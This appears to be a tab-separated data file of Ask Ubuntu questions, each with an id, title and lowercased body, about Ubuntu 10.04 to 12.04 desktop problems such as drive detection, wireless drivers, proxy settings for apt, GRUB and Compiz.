104588	only 746.52 gb of 3tb drive is seen when accessed via usb enclosure . works fine internally	i have a mediasonic smart drive superspeed 3.5 '' sata hdd external enclosure - usb 3.0 [ hd6-su3-bk ] . it has the via vl700 - super-speed usb 3.0 to sata controller which is supposed to support 3tb drives . the drive is an advanced format 3tb wdc wd30ezrx . i 'm running 64bit oneiric with the standard 3.0.0-16-generic kernel . usb controller : ati sb700/sb800 usb ohci0 controller ati sb700/sb800 usb ehci controller ati sb700/sb800 usb ohci0 controller ati sb700/sb800 usb ehci controller ati sb700/sb800 usb ohci2 controller ati sb700/sb800 usb ohci0 controller ati sb700/sb800 usb ehci controller nec usb controller when the drive is connected to the internal sata controller , i can access the whole 3tb , partition it with a gpt table and format it using xfs . when i put the drive in the enclosure , i can only see 746.52 gb . here 's how the kernel sees the drive when it 's connected to the internal sata interface . 2.855426 ] scsi 6:0:0:0 : direct-access ata wdc wd30ezrx-00m 80.0 pq : 0 ansi : 5 [ 2.855608 ] sd 6:0:0:0 : [ sdc ] 5860533168 512-byte logical blocks : ( 3.00 tb/2.72 tib ) [ 2.855611 ] sd 6:0:0:0 : [ sdc ] 4096-byte physical blocks [ 2.855619 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 here 's how the kernel sees the drive when connected via the usb enclosure . [ 605703.368137 ] usb 2-5 : new high speed usb device number 3 using ehci_hcd [ 605703.830770 ] initializing usb mass storage driver ... [ 605703.831288 ] scsi10 : usb-storage 2-5:1.0 [ 605703.831626 ] usbcore : registered new interface driver usb-storage [ 605703.831632 ] usb mass storage support registered . [ 605719.251982 ] scsi 10:0:0:0 : direct-access wdc wd30 ezrx-00mmmb0 80.0 pq : 0 ansi : 2 [ 605719.254314 ] sd 10:0:0:0 : attached scsi generic sg2 type 0 [ 605719.258115 ] sd 10:0:0:0 : [ sdc ] 1565565869 512-byte logical blocks : ( 801 gb/746 gib ) see how internally there 's 5,860,533,168 logical blocks and externally only 1,565,565,869 . i also noticed that sata reports wdc wd30ezrx-00m 80.0 pq : 0 ansi : 5 while usb reports wdc wd30 ezrx-00mmmb0 80.0 pq : 0 ansi : 2 what 's the difference between the two ? could this be the problem ? when connected to the sata controller , parted says : model : ata wdc wd30ezrx-00m ( scsi ) disk /dev/sdb : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 3001gb 3001gb xfs how can i access the whole drive when it 's in the enclosure ? do i need an updated kernel/driver ?
104589	which one is better for ubuntu ? arm or intel ?	if i was going to buy a new laptop or pc which would be better if i would only install ubuntu ? i 've read some articles about ubuntu booting really fast with arm and on their new 12.04 they promised 2seconds boot time . which would be better if i was only looking forward to fast loading like opening apps and booting and shut down fast ?
104590	gtk-warnings in terminal	i have ubuntu 11.10 installed on two different machines , both using x64 installs . only one machine returns these gtk warnings after using sudo gedit . i get these warnings when opening or saving a file . here is an example : ( gedit:2456 ) : gtk-warning ** ; attempting to store changes into '/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.kbgv9v ' : no such file or directory i also get another set of warnings related to `` attempting to set permissions of '' the above mention directory . is this something i should be concerned with ? any way to get rid of those warnings ? like i said , my other machine does n't return these warnings in the terminal .
104595	failed to download repository information after updating	i have a warning sign on the upper bar , a red triangle and an exclamation inside . i click this icon and i am informed that there are updates and the `` show updates '' option is available . i click on `` show updates '' and i am informed that the package information was last updated 78 days ago . i am prompted to click the check button for new updates . i click the check button and it says `` updating cache '' and after a moment a `` failed to download repository information '' message appears . this was the result of the execution of '' sudo apt-get update | grep no_pubkey : w : failed to fetch ppa.launchpad.net/openjdk/ppa/ubuntu/dists/oneiric/main/source/âś 404 not found w : failed to fetch ppa.launchpad.net/openjdk/ppa/ubuntu/dists/oneiric/main/âś 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . this situation has been happening often . what should i do ?
104603	making nautilus/cp/scp/rsync `` progress '' cache-aware	when transferring moderately large files ( ~500-800 mb ) to/from a usb disk in nautilus , or using ( s ) cp ( with progress bar from http : //chris-lamb.co.uk/2008/01/24/can-you-get-cp-to-give-a-progress-bar-like-wget/ ) , or when using rsync ... the progress reported is far from accurate . evidently the default file system cache size in ubuntu 11.10 64bit is quite a bit larger than for 32 bit . as a consequence , it appears to nautilus or rsync or whatever is doing the copying that the file has been completely copied , when in fact there is a large portion of the file left to write , but that entire portion is has been cached , so it appears to the program that the file has been written ( i.e . because it has , from the perspective of system calls ) . however , the actual output file takes a good 10-20 seconds more to actually fill up . is there anyway to tweak any of these pieces of software to report progress in terms of `` how much data has been written to the actual output file '' instead of `` how much data has been written to the operating system '' . my particular annoyance is that each of these programs reports that the file has been written , but then just hangs for a while reporting nothing . i suspect this is because the `` write '' system call has completed , but the `` close file '' system call is waiting for the cache to flush .
104605	ubuntu one dropbox conflict	i am using 11.10 and have been using dropbox on my various pcs ( windows and ubuntu ) for a long time . i decided to see what ubuntu one was about and loaded it on all my pcs . it started to amend my files in dropbox ( even though they were not being synced by u1 ) by adding .u1conflict to any that i tried to save in the dropbox folder . this has made my dropbox folder unworkable . i have removed u1 from all my pcs but the dropbox folder continues to add the suffix .
104606	not getting auto login page on my hathway internet connection	i am using firefox browser and my laptop is dell inspiron 1545 . i am using hathway internet connection . when i switch on my internet modem and try to use ( browse any website ) , for the first time in a day it will redirect me to hathway 's login ( something like `` login.hatyway.com/ ... .. '' ) page automatically . it is working fine in windows but not in ubuntu 11.10 . so i go back to windows every time and then login and then i come back to ubuntu to use . could you please let me know if there is a solution to this problem .
104608	enabling nomodeset in ubuntu and arch multiboot	i have an ubuntu and archlinux multiboot system . the grub is installed by the ubuntu system . so , it is grub 2 . i want to set the nomodeset for the arch boot . i am unable to set it permanently . i can not edit /boot/grub/grub.cfg as it is autogenerated editing /etc/default/grub not working as well ( as it changes only the ubuntu setting ) any ideas ?
104609	how can i change the color of my cursor in gnome-terminal ?	there are many similar-sounding questions , so let me emphasize : i only want to change the color of my cursor ; i do not want to change the color of my text . if it helps , however , my normal text color is white . i realize xterm allows this , but i prefer to stick with gnome-terminal . there does not seem to be a preference in the menus . system particulars : ubuntu 12.04 alpha 2 , gnome terminal 3.2.1 , xfce desktop
104612	no network connectivity ( not wired or wireless ) - rt5390	i am starting to think i simply need to accept a small loss and sell my new asus k73e . because i really do n't enjoy computing when i have to deal with windough $ and this windows 7 64 bit on my new asus is even worse than the old machines with xp . i have written to asus and they simply say `` we do n't support linux '' and while ralink 's website says they do support linux i ca n't get anyone to tell me what model ralink card might be in my machine . is anyone out there who might be able to give me some useful advice ? ? ? ? here is the answer to command lspci nn & & lsusb & & lsmod & & rfkill list all : di , snd_seq snd 54244 16 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm_oss , snd_mixer_oss , snd_pcm , snd_seq_oss , snd_rawmidi , snd_seq , snd_timer , snd_seq_device uvcvideo 57374 0 videodev 34361 1 uvcvideo v4l1_compat 13251 2 uvcvideo , videodev soundcore 6620 1 snd snd_page_alloc 7076 2 snd_hda_intel , snd_pcm psmouse 63677 0 serio_raw 3978 0 lp 7028 0 parport 32635 2 ppdev , lp fbcon 35102 71 tileblit 1999 1 fbcon font 7557 1 fbcon bitblit 4707 1 fbcon softcursor 1189 1 bitblit video 17375 0 output 1871 1 video vga16fb 11385 1 vgastate 8961 1 vga16fb ahci 32360 2 di , snd_seq snd 54244 16 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm_oss , snd_mixer_oss , snd_pcm , snd_seq_oss , snd_rawmidi , snd_seq , snd_timer , snd_seq_device uvcvideo 57374 0 videodev 34361 1 uvcvideo v4l1_compat 13251 2 uvcvideo , videodev soundcore 6620 1 snd snd_page_alloc 7076 2 snd_hda_intel , snd_pcm psmouse 63677 0 serio_raw 3978 0 lp 7028 0 parport 32635 2 ppdev , lp fbcon 35102 71 tileblit 1999 1 fbcon font 7557 1 fbcon bitblit 4707 1 fbcon softcursor 1189 1 bitblit video 17375 0 output 1871 1 video vga16fb 11385 1 vgastate 8961 1 vga16fb ahci 32360 2 edit # 2 lspci 00:00.0 host bridge : intel corporation device 0104 ( rev 09 ) 00:02.0 vga compatible controller : intel corporation device 0116 ( rev 09 ) 00:16.0 communication controller : intel corporation cougar point heci controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation cougar point usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation cougar point high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation cougar point pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation cougar point pci express root port 2 ( rev b5 ) 00:1c.5 pci bridge : intel corporation cougar point pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation cougar point usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation device 1c49 ( rev 05 ) 00:1f.2 sata controller : intel corporation cougar point 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation cougar point smbus controller ( rev 05 ) 02:00.0 network controller : ralink device 5390 03:00.0 ethernet controller : atheros communications device 1083 ( rev c0 ) lsusb bus 002 device 002 : id 8087:0024 bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 13d3:5710 imc networks bus 001 device 002 : id 8087:0024 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub thanks for the suggestion because this gave me a model for ralink rt5390 . i have now gone to ralink.com and downloaded ( via windows 7 ) the driver package ( it is a bz2 file ) . i hope i can figure out how to install it . and fyi - i was not able to run su ( not authorized ? ) and dmidecode did n't exist ( probably needs to be downloaded but no internet yet in ubuntu )
104617	always stop at `` grub > '' while booting	windows xp was installed first , then ubuntu 11.10 now i ca n't access both of them.message `` grub > '' showed every time i booted the system . amd duron ( pci slot on mainboard ) , sd ram 256 mb
104624	internet connection is sluggish	i 'm running ubuntu 11.10 on a desktop computer with an ethernet connection . pc specifications : amd sempron 145 sargas 2.8ghz socket am3 45w single-core desktop processor sdx145hbgmbox , 2-2gb of ram ; 4gb in total , biostar ta880gb+ motherboard , 300gb sata-hard drive , os- ubuntu 11.10 64-bit my computer 's internet connection seems a bit sluggish , even though it is on an ethernet connection . my friend 's laptop ( windows vista 32-bit ) is on the same network but seems to run faster even though it is on a wire-less connection . i 've complained to my internet carrier but have not found a solution to it yet . i 've tried different browsers also , such as chromium , google chrome , and fire fox . but no luck as of yet .
104625	ca n't download file of which size is bigger than 2gb	i can use a simple c program to generate 2gb+ file . but when i try to download a 3gb file through browser , it stops at 2gb . i tried chrome , firefox and opera . no one can download the file of which size is bigger than 2gb . what am i supposed to do ? ( my file system is ext4 )
104627	turn-off wifi / wlan & bluetooth completely ( electrically off ) , how ?	in windows , most laptops these days have a hot-key to turn off wireless modules completely ( i.e . airline mode ) , including wlan and bluetooth . i am currently on ubuntu 11.10 , and wondering as to what is the way to have the same effect , i.e . make sure that those modules are electrically off - not consuming any power , and the radio beacon is off .
104635	kde theme in ubuntu unity	i would like to know if it is possible to have a kde theme ( i think it 's called oxygen , but i 'm not sure ) for ubuntu unity ? i really like the theme used in kde but i prefer to use ubuntu unity . i wonder if anyone have tried that . thanks . @ chathurawidanage : i followed your instruction and installed oxygen-transparent successfully . however , i was not able to find the theme among the list in system settings - > appearance . there is no application appearance . i 'm using ubuntu 11.10 . i also tried using ubuntu tweak but only the icon is available on the option . any other way to activate this theme ?
104637	netbeans is not starting	i am using ubuntu 11.10 and installed netbeans today . the installation completed without any errors . but when i double click on the net beans icon in my desktop ... the program does n't start . what should i do to make net beans working ?
104641	effects do n't work after i install the nvidia drivers	i just installed ubuntu 11.10 64bit on my laptop and everything worked fine until i installed the nvidia driver ( for a geforce gt 525m ) . after i install the driver and reboot , the effects like snap windows do not work . in order to work i have uninstalled the driver . is there a way for me to use the driver and still have the effects available ? thanks for the help .
104651	how do i get wireless working on an asus notebook u56e ?	on version 11.04 ubuntu i have access to my wifi , but after i upgrade to 11.10 , i can never get wifi at all . if i 'm wired then it works , but if i 'm not then it doesnt work .
104652	manually start ubuntu one daemon	i would like to be able to manually start and stop the ubuntu one daemon . however , i need to know : what is the name of the ubuntu one daemon ? can i use update-rc.d ( ubuntu one daemon ) disable & to manually start it ? any help will be greatly appreciated . updated remove it from auto starting when system boots . i did it with update-rc.d bluetooth disable
104656	can i install a desktop without any other applications ?	i would like to know how i can install ubuntu 11.10 + unity without any other application production like libre office , firefox and so on ... thanks in advance for your reply !
104659	ssh connection getting refused	i am new to linux and i am trying to establish a ssh connection with my friend 's pc in the same lan , but i am getting `` ssh : connect to host 192.168.71.70 port 22 : connection refused '' . both ways are getting connection refused . can anyone please help me resolve this problem .
104661	can not open synaptic	i installed unity 5 in ubuntu 11.10 , as seen in omg ! ubuntu ! but since then synaptic is not working . i even tried purging it and reinstalling it again , but it did n't work . i need to run synaptic or delete unity 5 . i will appreciate any help .
104662	how to run a program without typing the full path ?	system utilities such as ls do n't need to have the full path typed before executing them . however , to execute netbeans , i have to type /home/chris/netbeans-7.0.1/bin/netbeans . how can i make it so that i only have to type netbeans ?
104667	desktop directory not opening	i am completely new to ubuntu or any distribution of linux altogether . while using the terminal , when i am in the /home/username directory the ls command shows desktop and download directories but the command cd /desktop does not work . it says bash : cd : /desktop : no such file or directory . another directory , which i made manually , opens up ok. it also does this with many other folders , what am i doing wrong here .
104678	how do i stop sound from muting when the screen is locked ?	how to change the settings to the screen locker not to mute the sound while the screen is locked ?
104679	can not install lazarus	i have installed lazarus on 10.04 lucid by downloading it from the website and using dpkg . however , then my ubuntu software manager and apt-get became useless . after discussion i was suggested to remove lazarus and run sudo apt-get -f install which was supposed to repair my packages . lazarus was removed , usc and apt-get work , but i still can not install lazarus from usc . when i click install nothing happens . using sudo apt-get install lazaurs ends with the following : following packages have unresolved dependencies lazarus : requires : lazarus-ide ( > = 0.9.28.2-8ubuntu1 ) e : packages are damaged how to solve that issue ? thanks and regards : )
104680	/tmp is not ready or not present	today i found out that mint with lxde had fall . it said that '' /tmp is not ready or not present '' . how to improve it ? additional question : how to transfer /home on separate tome ?
104684	updating ubuntu from inside the corporate network	after connecting my computer to the corporate network i do n't have direct internet access . this is done now through some proxy server . i can connect to the internet from firefox by the following way : preferences - advanced - network - connection - settings - automatic proxy configuration url : http : //some_path/some_file.pac so , firefox is ok . but all install/update functions do n't work . for example , this is synaptic package manager error message : the repository may no longer be available or could not be contacted because of network problems . failed to fetch http : //il.archive.ubuntu.com/ubuntu/dists/lucid/release.gpg something wicked happened resolving 'il.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch http : //il.archive.ubuntu.com/ubuntu/dists/lucid/main/i18n/translation-en_us.bz2 something wicked happened resolving 'il.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) ... it looks like i need to explain to my os , how to connect to the internet . how can i do this ? ubuntu version is 10.04 . edit : after setting network proxy , as described in kingmilo 's answer , i still have the same problem . for example : alex @ alex-ubuntu : ~ $ sudo apt-get install execstack reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-2.6.32-21 linux-headers-2.6.32-21-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libelfg0 the following new packages will be installed : execstack libelfg0 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 134kb of archives . after this operation , 410kb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! libelfg0 execstack install these packages without verification [ y/n ] ? y err http : //il.archive.ubuntu.com/ubuntu/ lucid/main libelfg0 0.8.13-1 something wicked happened resolving 'il.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //il.archive.ubuntu.com/ubuntu/ lucid/main execstack 0.0.20090925-1 something wicked happened resolving 'il.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/libe/libelf/libelfg0_0.8.13-1_i386.deb something wicked happened resolving 'il.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/p/prelink/execstack_0.0.20090925-1_i386.deb something wicked happened resolving 'il.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? edit 2. nslookup www.google.com server : 10.192.188.72 address : 10.192.188.72 # 53 ** server ca n't find www.google.com : nxdomain
104690	title bar disappears suddenly when compiz is enabled	i am running lubuntu 11.10 ( lxde based on ubuntu 11.10 ) . a few days ago , i installed the macbuntu , but it is n't compatible with lxde and so , i uninstalled it . and today i installed compiz ( i have tried to install compiz in lubuntu 11.10 before and everything goes well at that time ) . i tried to run compiz with the command compiz -- replace and everything seems ok . but after a short time ( usually within three minutes ) , the title bar and taskbar disappeared suddenly , and i can not open any program with the hot key ( e.g . i usually open the terminal with ctrl+alt+t , but it does n't work at that time ) . i can do nothing but kill the xorg and stop the compiz in tty1 . now the system is fine without compiz . but when i try to run compiz , the horrible thing will happen again . and i noticed that , usually when i close a window , or change the configuration of compiz , the title bar would disappear suddenly . i really do n't know how i can fix it . can anyone give a hand to me ? another : i have run gtk-window-decorator -- replace to start the window decoration , i got the error : failed to load theme `` ambiance '' : failed to find a valid file for theme ambiance ( gtk-window-decorator:3994 ) : wnck-warning ** : unhandled action type _ob_wm_action_undecorate
104694	ubuntu : where to download ubuntu repository	i have installed the ubuntu 11.10 on my pc but unfortunately my internet connection is not working there now i was wondering if i could download all the repository on some other window machine . and later i could install that repository to my ubuntu .
104695	how do i change mirrors in ubuntu server from regional to main ?	i have a lucid server ( 10.04 ) set up and i would like to change the mirror from us ( or any other country ) to the main ubuntu mirror . for example my two first entries in sources.list are : deb http : //us.archive.ubuntu.com/ubuntu/ lucid main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid main restricted in a desktop environment i would select the main mirror like this : but how do i do that from the terminal as i do n't have a graphical environment installed !
104696	how to get rid of `` untrusted connection '' error in empathy	i love empathy but after i moved from ubuntu to xubuntu 11.10 and installed empathy it broke . every time i login i get this error message : both on gmail and facebook chat . i always check `` remember this choice for future connections '' in facebook and gtalk prompt ( sometimes i have to do it ~3 times ) . it 's like that for about 3 months now . i almos got used to it . almost . but it became super frustrating . i have tried solutions found here and here . i have downloaded digicert high assurance ca-3 from digicert.com saved it in /usr/share/ca-certificates/mozilla then runned : chown root : root /usr/share/ca-certificates/mozilla/digicerthighassuranceca-3.crt dpkg-reconfigure ca-certificates logged out , logged back into xubuntu and again `` this connection ... '' also tried with exporting the certificate from firefox . same result . i do n't care about security issues i just want to use empathy without that extremely annoying prompts . here is my question : how can i do it ? is there some other way to force empathy to accept certificates ( and shut the hell up ) ? or maybe i can block that messages from being displayed or maybe there is a way to auto accept them ? eg . run some macro or parallel script that will do that ? help me pretty please..
104697	is the asus xonar u3 supported ?	i suppose the question applies to linux in general but what have user 's experiences been with asus xonar u3 ? does it improve the sound quality of onboard or the generic drivers cripple it ?
104698	guest additions installed but usb devices ca n't be seen in devices > usb	i already installed guest additions for virtualbox but i ca n't see my usb flash from virtualbox device list . please help me .
104703	laptop sim card slot not recognized	my laptop , lenovo t520 has a sim card slot that can be revealed when removing the battery . i have a 3g usb dongle with a sim card that works fine , however i would like to take advantage of the built-in sim slot . unfortunately when booting up the laptop with the sim card inserted into the sim slot it seems like ubuntu does not recognize the slot itself as my network manager makes no mention of a mobile broadband connection . has anybody worked with and resolved something like this in ubuntu ? i 've trawled the net a bit for both ubuntu and *nix solutions but not much comes up . not sure what output would be helpful but here is my lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 147e:2016 upek biometric touchchip/touchstrip fingerprint sensor bus 002 device 004 : id 0480 : a004 toshiba america info . systems , inc . bus 001 device 005 : id 04f2 : b217 chicony electronics co. , ltd bus 002 device 003 : id 17ef:1003 lenovo integrated smart card reader
104706	how to sync folders on different partitions ( symlink ? )	i use ubuntu one to synch my home/documents folder among more computers . on a portable tablet i have set the documents folder in a separate fat32 partition named sda6 , and i made it default documents folder with ubuntu tweaks . how do i synchronize it with my /documents cloud ? i tried to link /sda/documents in my home folder but it did n't succeed : ubuntuone still tries to set an own documents folder and does n't let me sync the linked folder with the cloud . what can i do , would please anyone help me ?
104710	how to restore ethernet connection ?	i 've had some issues with installing lazarus in 10.04 . after i finally installed it with aptitude , while running it prompted whole bunch of errors . finally my pc was suspended and i had to reset it . after that my ethernet does n't work . in my file /etc/network/interfaces there is only auto lo iface lo inet loopback no sign of eth0 . many of possible solutions do n't work . unfortunately i can not give the full output of sudo ifconfig -v -a or sudo lshw -c network because i am writing this post using my spartphone . the fact is that the first shows my eth0 , and the latter gives : *- network disabled description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller . reinstalling drivers did n't change a thing . how can i run the same procedure that detects connection during ubuntu installation process ? i suspect that it could solve the problem . thanks
104711	cd burn error message	i 'm using oneiric and i ca n't burn cds and dvds on my system . i used brasero and k3b and none would work , it would show an error every time somewhere near the 70 % mark and the error would be something like it ca n't access cdrom or something . try to fix it through some instructions on the forums but it would n't work still . any help ? i 'm running 11.10 on a 64bit machine . thank y'all in advance guys !
104715	ubuntu project files and directories documentation	when you download some larger project , there is usually the documentation describing what is in individual files and directories and its purpose . i ca n't find this information for the main ( controlling ) part of ubuntu project . moreover i ca n't find some readme file in the project describing it . does this officially exist ? could you post me a link ? ( this would be extremely difficult to answer it without a link ) . i have also found similar question but it 's depricated and does n't answer my question , so i asked rather this question ( i also consulted it with a moderator of this portal yesterday ) .
104719	sound card not working well on dell latitude e6520	the sound disappears at times and i can not properly configure the mic for recording . i use skype often and i can not listen to the built-in mic at times . i am not sure if i need to update the driver or how can i check what 's wrong with this . the microphone array works perfect in windows 7 but am having problem getting it right here . thanks ,
104721	.profile ran into an infinite loop	i changed my .profile to run a script at startup . that scripts loops through all the files in a folder and sets it as the background image . it sleeps for 10 seconds before it sets the next one as the wallpaper . the problem is , i did n't tell it to run as a background process . so , at login , it runs the script in the main thread and i 'm screwed . i ca n't do anything . it 's not responsive . i have nearly 1200 images , so it could take nearly 3.33 hours to complete . i can wait but i do n't want to . is there any solution ? btw , the login screen does not appear at login . it automatically signs in ( i checked that option at ubuntu install ) . so , there 's no apparent way to log in using failsafe gnome mode . i use ubuntu 10.04 . any help would be appreciated .
104722	wifi do n't work when i use bittorrent apps !	when i use apps like deluge , transmission or ktorrent , the wifi stop working ! someone know why ? ( sorry for my english , in not a native )
104723	how to install debug flash player 11.1 on 64-bit	i had firefox working with the debug flash player that i downloaded from adobe flash player support center following the instructions on http : //ubuntuforums.org/showthread.php ? t=1300563 . however , today , an automatic update came into my ubuntu 11.10 , which upgraded the flash player to 11.1.102.62 ( a non-debug version ) . when i copied the debug flash player again per instructions in the ubuntuforms link , flash does not work anymore . i guess that the problem might be related to this bug : https : //bugs.launchpad.net/ubuntu/+source/flashplugin-nonfree/+bug/870835 if they are now using the 64-bit flash plugin , it would make sense that the 32-bit debug flash player ( there is no 64-bit debug flash player for the moment ) does not work . is there anybody who knows how to work around this so i get the i386 plugin back with the nspluginwrapper ?
104730	how to install wireless driver on compaq nx6120 laptop	just installed ubuntu 11.10 in my compaq nx6120 laptop . i turn on the wifi but it says `` wireless disabled by hardware switch . '' is this a driver problem or is there any switch in laptop for enabling it ? please help output of some commands are given below $ sudo lshw -c network** *-network:0 disabled description : wireless interface product : pro/wireless 2200bg [ calexico2 ] network connection vendor : intel corporation physical id : 4 bus info : pci @ 0000:02:04.0 logical name : eth1 version : 05 serial : 00:12 : f0:99 : dd : dc width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ipw2200 driverversion=1.2.2kmprq firmware=abg:9.0.5.27 ( dec 12 2007 ) latency=64 link=no maxlatency=24 mingnt=3 multicast=yes wireless=ieee 802.11bg resources : irq:21 memory : d0000000-d0000fff *-network:1 description : ethernet interface product : netxtreme bcm5705m_2 gigabit ethernet vendor : broadcom corporation physical id : e bus info : pci @ 0000:02:0e.0 logical name : eth0 version : 03 serial : 00:14:38:00 : ea : cb size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 66mhz capabilities : pm vpd msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.119 duplex=full firmware=5705-v3.24 ip=192.168.1.3 latency=64 link=yes mingnt=64 multicast=yes port=twisted pair speed=100mbit/s resources : irq:16 memory : d0020000-d002ffff i am a beginner please help .
104731	setting button stopped working after installing mint 12 desktop theme	i installed linux mint theme following some instructions in this webpage . it works but software center stop working.i corrected the problem of software center but now the setting button in update manager stop working . when i press setting in update manager it checks for update.how do i correct this ? i got the following error when i do sudo apt-get update . err http : //ppa.launchpad.net oneiric/main sources e : some index files failed to download . they have been ignored , or old ones used instead .
104733	improve system performance by stopping daemons/services	i am trying to improve my system performance by removing some daemon/services . on my desktop pc i need to stop some daemons/services which are installed by default in ubuntu from auto starting . & manually start when ever i want to . can any one provide list of daemons/services which are installed by default in ubuntu & it will be ok with manual start just like i did with ubuntu one these are few services/daemons i have never used it on my desktop & uninstalled it printer , scanner ( saned ) , bluetooth . i have noticed at shutdown that acpi daemon take 2 to 3 seconds ( advanced configuration and power interface ) in help its shows that u can actually turn it off . can i uninstall it & is it safe ? if yes how ? modem-manager takes up to 2 seconds at shutdown & fail every time pc reboot/shutdown i have managed to reduce at least 3 to 4 sec at reboot/start ubuntu , i have made some script so when ever i need that service i just click on script & its on . example vmware script note : dont want to use extra tools like chkconfig , rcconf .
104739	which applications are using internet	how can i check which applications are using internet ? how to block internet accessing one particular application ? is there any gui tool that exist for it in ubuntu software centre ? thanks in advance !
104741	how to continue configuring packages after a network disruption	today during the normal updating process , i had a temporarily network disconnect . connection was lost during `` configuring packages '' ( not during download ) . for some reason the process bar did not show any progress since the network disconnect . ( i think it was during configuring flash-plugin and the details showed `` wget ... '' ) . the the update-manager indicated the network disconnect and quit itself . now , network is back up again but i guess some packages remain not configured ( at least the flash-plugin never finished ) . how can i resume the update-process where it stopped or reconfigure the downloaded packages ? ubuntu 11.10 x86_64
104745	unable to transfer files via bluetooth between a samsung corby txt and laptop	i successfully paired my laptop & my phone . when i try to send any file from my laptop to my phone via bluetooth , i am getting this message in ubuntu 11.10 : permission denied ( 13 ) i am also not able to send any data from my phone to laptop via bluetooth ! also i want to mention that : in ubuntu 11.04 , i used to send data from my laptop to phone via bluetooth but was not able to send any data from my phone to laptop via bluetooth .
104749	change home directory for gnuplot	is there a way to change the gnuplot home directory permanently to a home/user/gnuplot directory without typing cd home/user/gnuplot after every gnuplot start ?
104750	how do i reopen an instance window once it has disappeared from desktop ?	i 'm new to ubuntu . i use skype and often the main window just disappears from my desktop . the skype instance itself is still running in the background . i know this because i can see its notifications on the bottom right side of the screen . if i click on the skype icon again , ubuntu will launch a new instance instead of maximizing the running instance . of course this will not work because skype will not let you sign in : another instance of skype may be running . how do i refocus/bring to the foreground the existing skype instance ? in windows , you can restore running instances through the taskbar . i 've tried cycling through open windows , but the running instance window is no where to be seen .
104752	screencast on ubuntu 11.10	i 'm trying to make a screencast in ubuntu 11.10 . i need to insert some text for explaining all the steps . something like this . i looked for older questions and i saw that one of the few software that allows you to insert some text in the screencast is wink . however it does n't work for me on ubuntu 11.10 . when i try to start the screen cast all the wink icon disappear from the sidebar and so i 'm not able anymore to stop the registration . is there a way for fixing it ? otherwise , is there an alternative software ? thanks !
104755	how to check internet speed via terminal ?	instead of going to sites like netspeed etc i want to check my current internet speed in terminal in 11.10 , how can i do it ?
104757	mic `` disables '' after restart	i have configurated the front mic as imput in sound settings , and it works fine , but after i restart the pc ( no always the first time , but sooner or later it happens ) the pc does n't capture anything from the front mic , that is still selected and not mute . to make it work again i have to select other imput device and then select the front mic again . this is annoying , is there some way to fix it ? thanks !
104760	virtual box : issue connecting to security.ubuntu.com	i have windows 7 as host system , and installed ubuntu 11.10 as guest . i 'm using the latest version of virtualbox . the networking works fine , as installation completed correctly and i can browse web pages . i had issue of badsig 40976eaf437d05b5 when i used apt-get . i tried all the workarounds in the web ( clearing cache , installing aptitude , removing files from /var/lib/apt/lists/partial , getting the key again , disabling ipv6 , etc ) . i do n't see the badsig error now . but i get the following error when trying to run apt-get update : unable to connect to security.ubuntu.com [ ip:91.189.92.166 ] i can not ping to 91.189.92.166 either . i can ping www.google.com and it works . any pointers appreciated . thanks , bsr cat /etc/resolv.conf domain abc.be search abc.be nameserver 10.240.0.x nameserver 193.xx.xxx.55 where abc.be , etc . are valid values .
104761	how do i make the unity launcher background transparent ?	i found a way to make the icon backgrounds transparent for the unity launcher by changing the files under /usr/share/unity/4 . does anyone know how to make the background transparent for the launcher itself ? i already made it transparent under compiz , but i want to remove the line that separates the launcher from the desktop . if anything , i just want to make it look like the icons are floating .
